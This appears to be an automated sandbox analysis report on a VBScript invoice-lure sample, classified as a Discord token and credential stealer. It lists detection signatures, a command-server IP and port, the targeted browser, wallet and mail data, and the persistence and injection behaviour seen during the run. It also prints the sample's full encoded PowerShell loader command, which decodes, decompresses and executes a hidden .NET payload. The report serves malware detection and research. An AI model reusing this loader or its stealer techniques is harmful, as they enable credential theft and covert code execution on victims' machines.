Windows Analysis Report
Fattura-24SC-99245969925904728562.vbs

Overview

General Information

Sample name: Fattura-24SC-99245969925904728562.vbs
Analysis ID: 1546109
MD5: 6f5153972552fdc27d794087d11c0f12
SHA1: 2392e3fb23d622dd6ef791b388bd0acadef3f069
SHA256: 577564ce2face042cce2f1f7f2a28c42a96d08b3929e63497da486fd90d295d0
Tags: SPAM-ITA, vbs, user-JAMESWT_MHT

Detection

Discord Token Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected Discord Token Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Drops VBS files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: PowerShell Script Run in AppData
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection

Source: Fattura-24SC-99245969925904728562.vbs ReversingLabs: Detection: 26%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000006386000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.00000000061E6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000006386000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.00000000061E6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: powershell.pdbUGP source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312087444.00000000003D1000.00000020.00000001.01000000.00000005.sdmp, OSDescription.vbs.exe, 0000000F.00000000.1514068078.0000000000348000.00000020.00000001.01000000.0000000C.sdmp, OSDescription.vbs.exe.13.dr, Fattura-24SC-99245969925904728562.vbs.exe.4.dr
Source: Binary string: protobuf-net.pdbSHA256}Lq source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: powershell.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312087444.00000000003D1000.00000020.00000001.01000000.00000005.sdmp, OSDescription.vbs.exe, 0000000F.00000000.1514068078.0000000000348000.00000020.00000001.01000000.0000000C.sdmp, OSDescription.vbs.exe.13.dr, Fattura-24SC-99245969925904728562.vbs.exe.4.dr
Source: Binary string: protobuf-net.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 4x nop then jmp 0A033B28h 7_2_0A033A68
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 4x nop then jmp 0A033B28h 7_2_0A033A70
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 7_2_0A0386F9
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 7_2_0A038700
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 7_2_0A0ED8F8
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 15_2_09CAD8F8
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 4x nop then jmp 09CE3B28h 15_2_09CE3A68
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 4x nop then jmp 09CE3B28h 15_2_09CE3A70
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 15_2_09CE8700
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 15_2_09CE86F9
Source: global traffic TCP traffic: 192.168.2.7:49706 -> 185.36.141.107:7702
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.7:49740
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.7:49973
Source: unknown DNS traffic detected: query: 90.168.9.0.in-addr.arpa replycode: Name error (3)
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: global traffic DNS traffic detected: DNS query: 90.168.9.0.in-addr.arpa
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1357497221.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1390938323.0000000005DDC000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000048A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1539348684.000000000277E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000048A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discordapp.com/api/v9/users/
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1632367660.0000000004063000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://icanhazip.com/
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1390938323.0000000005DDC000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000274E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefox
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000274E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000274E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud

Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc 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

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell

System Summary

Source: Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: OSDescription.vbs.exe PID: 6024, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A035480 NtProtectVirtualMemory, 7_2_0A035480
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A036D08 NtResumeThread, 7_2_0A036D08
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A035478 NtProtectVirtualMemory, 7_2_0A035478
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 7_2_0A036D00 NtResumeThread, 7_2_0A036D00
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CE6D08 NtResumeThread, 15_2_09CE6D08
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CE5480 NtProtectVirtualMemory, 15_2_09CE5480
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CE6D00 NtResumeThread, 15_2_09CE6D00
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 15_2_09CE5478 NtProtectVirtualMemory, 15_2_09CE5478
Source: Fattura-24SC-99245969925904728562.vbs Initial sample: Strings found which are bigger than 50
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312120527.0000000000434000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1357497221.0000000002C09000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004DC6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs Fattura-24SC-99245969925904728562.vbs
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005206000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameOwvaenanf.exe" vs Fattura-24SC-99245969925904728562.vbs
